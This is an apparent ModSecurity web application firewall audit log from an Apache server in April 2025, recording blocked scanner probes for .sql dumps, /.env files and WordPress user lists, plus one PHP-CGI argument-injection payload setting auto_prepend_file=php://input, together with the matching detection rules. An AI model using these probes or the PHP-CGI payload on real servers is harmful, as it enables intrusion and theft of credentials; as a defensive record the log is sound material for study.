Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744646399133193 2414 (- - -)
Stopwatch2: 1744646399133193 2414; combined=858, p1=450, p2=379, p3=0, p4=0, p5=29, sr=138, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--eb737304-Z--
--0abf6f5a-A--
[14/Apr/2025:23:00:00 +0700] Z_0xANPxEtam20ggC7hGlAAAAJE 103.236.140.4 44554 103.236.140.4 8181
--0abf6f5a-B--
GET /wp_new.sql HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 45.66.35.20
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 45.66.35.20
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/329.0.660098639 Mobile/15E148 Safari/604.1
Accept: */*
--0abf6f5a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0abf6f5a-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744646400018882 1569 (- - -)
Stopwatch2: 1744646400018882 1569; combined=612, p1=304, p2=281, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0abf6f5a-Z--
--390e351a-A--
[14/Apr/2025:23:00:00 +0700] Z_0xANga3eJwvi_gLpJBEwAAAEc 103.236.140.4 44556 103.236.140.4 8181
--390e351a-B--
GET /migration.sql HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 45.66.35.20
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 45.66.35.20
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/329.0.660098639 Mobile/15E148 Safari/604.1
Accept: */*
--390e351a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--390e351a-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744646400889952 14181 (- - -)
Stopwatch2: 1744646400889952 14181; combined=25111, p1=346, p2=375, p3=0, p4=0, p5=12208, sr=65, sw=0, l=0, gc=12182
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--390e351a-Z--
--b6b8694d-A--
[14/Apr/2025:23:00:01 +0700] Z_0xAdPxEtam20ggC7hGlQAAAJA 103.236.140.4 44558 103.236.140.4 8181
--b6b8694d-B--
GET /archief.sql HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 45.66.35.20
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 45.66.35.20
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/329.0.660098639 Mobile/15E148 Safari/604.1
Accept: */*
--b6b8694d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b6b8694d-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744646401764976 2280 (- - -)
Stopwatch2: 1744646401764976 2280; combined=823, p1=408, p2=386, p3=0, p4=0, p5=29, sr=87, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b6b8694d-Z--
--22f69456-A--
[14/Apr/2025:23:00:02 +0700] Z_0xAtPxEtam20ggC7hGlgAAAJI 103.236.140.4 44560 103.236.140.4 8181
--22f69456-B--
GET /adminer.sql HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 45.66.35.20
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 45.66.35.20
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/329.0.660098639 Mobile/15E148 Safari/604.1
Accept: */*
--22f69456-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--22f69456-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744646402627443 2457 (- - -)
Stopwatch2: 1744646402627443 2457; combined=903, p1=423, p2=449, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--22f69456-Z--
--6d59c20a-A--
[14/Apr/2025:23:00:03 +0700] Z_0xA4gxSXM4jtK9zHGOpgAAAMo 103.236.140.4 44562 103.236.140.4 8181
--6d59c20a-B--
GET /phpmyadmin.sql HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 45.66.35.20
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 45.66.35.20
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/329.0.660098639 Mobile/15E148 Safari/604.1
Accept: */*
--6d59c20a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6d59c20a-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744646403469814 2440 (- - -)
Stopwatch2: 1744646403469814 2440; combined=857, p1=433, p2=395, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6d59c20a-Z--
--b6921b7d-A--
[14/Apr/2025:23:00:05 +0700] Z_0xBdga3eJwvi_gLpJBFAAAAEQ 103.236.140.4 44564 103.236.140.4 8181
--b6921b7d-B--
GET /myadmin.sql HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 179.43.159.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 179.43.159.195
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/329.0.660098639 Mobile/15E148 Safari/604.1
Accept: */*
--b6921b7d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b6921b7d-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744646405031944 2924 (- - -)
Stopwatch2: 1744646405031944 2924; combined=1010, p1=491, p2=487, p3=0, p4=0, p5=32, sr=99, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b6921b7d-Z--
--be815665-A--
[15/Apr/2025:00:10:08 +0700] Z_1BcNPxEtam20ggC7hGqwAAAIU 103.236.140.4 44978 103.236.140.4 8181
--be815665-B--
GET /.env HTTP/1.0
Host: mignere.twilightparadox.com
X-Real-IP: 159.89.174.87
X-Forwarded-Host: mignere.twilightparadox.com
X-Forwarded-Server: mignere.twilightparadox.com
X-Forwarded-For: 159.89.174.87
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--be815665-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--be815665-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744650608655985 522 (- - -)
Stopwatch2: 1744650608655985 522; combined=179, p1=160, p2=0, p3=0, p4=0, p5=19, sr=48, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--be815665-Z--
--b148e62d-A--
[15/Apr/2025:00:45:58 +0700] Z_1J1tPxEtam20ggC7hGuQAAAI0 103.236.140.4 45230 103.236.140.4 8181
--b148e62d-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://smkn22-jkt.sch.id
Host: smkn22-jkt.sch.id
X-Real-IP: 154.193.155.185
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 154.193.155.185
X-Forwarded-Proto: https
Connection: close
Origin: https://smkn22-jkt.sch.id
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
--b148e62d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b148e62d-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744652758094994 3051 (- - -)
Stopwatch2: 1744652758094994 3051; combined=1309, p1=439, p2=842, p3=0, p4=0, p5=28, sr=88, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b148e62d-Z--
--1b896d55-A--
[15/Apr/2025:01:08:38 +0700] Z_1PJlpzfFgMsbYwm2Kh5wAAAA0 103.236.140.4 45954 103.236.140.4 8181
--1b896d55-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.71.106
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.71.106
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 9; GM1917) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
Accept-Charset: utf-8
--1b896d55-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1b896d55-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744654118055320 874 (- - -)
Stopwatch2: 1744654118055320 874; combined=381, p1=348, p2=0, p3=0, p4=0, p5=32, sr=150, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1b896d55-Z--
--46b04a25-A--
[15/Apr/2025:01:35:04 +0700] Z_1VWNga3eJwvi_gLpJC2wAAAEg 103.236.140.4 52190 103.236.140.4 8181
--46b04a25-B--
GET /.env HTTP/1.0
Host: bolang.twilightparadox.com
X-Real-IP: 146.190.103.103
X-Forwarded-Host: bolang.twilightparadox.com
X-Forwarded-Server: bolang.twilightparadox.com
X-Forwarded-For: 146.190.103.103
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--46b04a25-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--46b04a25-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744655704906079 696 (- - -)
Stopwatch2: 1744655704906079 696; combined=279, p1=244, p2=0, p3=0, p4=0, p5=35, sr=69, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--46b04a25-Z--
--b7839631-A--
[15/Apr/2025:01:56:24 +0700] Z_1aWIgxSXM4jtK9zHGP8wAAAMU 103.236.140.4 52294 103.236.140.4 8181
--b7839631-B--
GET /.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 196.251.67.143
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 196.251.67.143
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Upgrade-Insecure-Requests: 1
--b7839631-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b7839631-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744656984835492 898 (- - -)
Stopwatch2: 1744656984835492 898; combined=353, p1=303, p2=0, p3=0, p4=0, p5=50, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b7839631-Z--
--ed40f47e-A--
[15/Apr/2025:02:15:07 +0700] Z_1eu9PxEtam20ggC7hIXwAAAIY 103.236.140.4 52922 103.236.140.4 8181
--ed40f47e-B--
GET /.env HTTP/1.0
Host: bolang.twilightparadox.com
X-Real-IP: 167.99.181.249
X-Forwarded-Host: bolang.twilightparadox.com
X-Forwarded-Server: bolang.twilightparadox.com
X-Forwarded-For: 167.99.181.249
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--ed40f47e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ed40f47e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744658107477332 848 (- - -)
Stopwatch2: 1744658107477332 848; combined=314, p1=277, p2=0, p3=0, p4=0, p5=36, sr=74, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ed40f47e-Z--
--14c65c76-A--
[15/Apr/2025:02:30:24 +0700] Z_1iUFpzfFgMsbYwm2KkWwAAABg 103.236.140.4 53088 103.236.140.4 8181
--14c65c76-B--
GET /.env HTTP/1.0
Host: wooin.epicgamer.org
X-Real-IP: 64.227.70.2
X-Forwarded-Host: wooin.epicgamer.org
X-Forwarded-Server: wooin.epicgamer.org
X-Forwarded-For: 64.227.70.2
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--14c65c76-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--14c65c76-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744659024337885 860 (- - -)
Stopwatch2: 1744659024337885 860; combined=331, p1=290, p2=0, p3=0, p4=0, p5=41, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--14c65c76-Z--
--a098d354-A--
[15/Apr/2025:02:41:56 +0700] Z_1lBFpzfFgMsbYwm2KkZgAAABU 103.236.140.4 53164 103.236.140.4 8181
--a098d354-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.71.168
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.71.168
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 OPR/62.0.3331.72
Accept-Charset: utf-8
--a098d354-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a098d354-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744659716960278 859 (- - -)
Stopwatch2: 1744659716960278 859; combined=336, p1=300, p2=0, p3=0, p4=0, p5=36, sr=81, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a098d354-Z--
--4c983a1c-A--
[15/Apr/2025:04:51:42 +0700] Z_2Dbs-f7AifS1fst95zEwAAAAI 103.236.140.4 60158 103.236.140.4 8181
--4c983a1c-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 165.227.217.111
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 165.227.217.111
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--4c983a1c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4c983a1c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744667502397526 773 (- - -)
Stopwatch2: 1744667502397526 773; combined=301, p1=269, p2=0, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4c983a1c-Z--
--3925c57e-A--
[15/Apr/2025:05:24:11 +0700] Z_2LC8-f7AifS1fst95zGgAAABE 103.236.140.4 60218 103.236.140.4 8181
--3925c57e-B--
POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.141.38
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.141.38
X-Forwarded-Proto: http
Connection: close
Content-Length: 110
User-Agent: python-requests/2.25.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
--3925c57e-C--
--3925c57e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3925c57e-E--
--3925c57e-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744669451610642 4516 (- - -)
Stopwatch2: 1744669451610642 4516; combined=2760, p1=504, p2=2226, p3=0, p4=0, p5=30, sr=84, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3925c57e-Z--
--1c053c2d-A--
[15/Apr/2025:05:54:50 +0700] Z_2SOs-f7AifS1fst95zHwAAAAE 103.236.140.4 60286 103.236.140.4 8181
--1c053c2d-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.81.194
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.81.194
X-Forwarded-Proto: https
Connection: close
User-Agent: SuperBot/4.4.0.60 (Windows XP)
Accept-Charset: utf-8
--1c053c2d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1c053c2d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744671290049886 837 (- - -)
Stopwatch2: 1744671290049886 837; combined=334, p1=296, p2=0, p3=0, p4=0, p5=38, sr=81, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1c053c2d-Z--
--71d5fe23-A--
[15/Apr/2025:07:13:15 +0700] Z_2km6XLWI2MDahumW9riQAAANc 103.236.140.4 60524 103.236.140.4 8181
--71d5fe23-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.71.168
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.71.168
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 9; CLT-L29 Build/HUAWEICLT-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36 OPR/48.1.2331.132804
Accept-Charset: utf-8
--71d5fe23-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--71d5fe23-H--
